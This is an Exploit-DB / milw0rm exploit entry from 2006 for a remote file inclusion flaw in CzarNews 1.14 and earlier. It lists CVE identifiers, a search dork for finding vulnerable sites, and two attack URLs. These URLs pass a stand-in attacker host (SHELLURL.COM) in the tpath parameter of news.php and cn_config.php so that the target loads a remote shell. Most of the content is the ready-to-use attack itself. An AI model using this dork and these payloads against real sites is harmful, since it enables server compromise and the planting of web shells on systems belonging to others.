CzarNews <= 1.14 tpath Remote File Inclusion Vulnerability

2006-07-13T00:00:00
ID EDB-ID:2009
Type exploitdb
Reporter SHiKaA
Modified 2006-07-13T00:00:00

Description

CzarNews <= 1.14 (tpath) Remote File Inclusion Vulnerability. CVE-2005-0859,CVE-2006-3685. Webapps exploit for php platform

                                        
                                            =================================================================
CzarNews &lt;= (tpath) Remote File Inclusion Exploit
================================================================
                                                                |
Critical Level : Dangerous                                       |
                                                                |
=================================================================
Dork :  "CzarNews v1.12 " | "CzarNews v1.13" | "CzarNews v1.14 "

http://sitename.com/news.php?tpath=http://SHELLURL.COM?
http://sitename.com/cn_config.php?tpath=http://SHELLURL.COM?

===============================================================================
Discoverd By : SHiKaA

Conatact : SHiKaA-[at]hotmail.com

GreetZ : Semsemmasr Black_Scorpion Medo_Ye7ya Kambaa  NANA METO7575 Gendiaaa Saw SnIpEr_Sa Masry OSA FEGLA 3amer
=================================================================


# milw0rm.com [2006-07-13]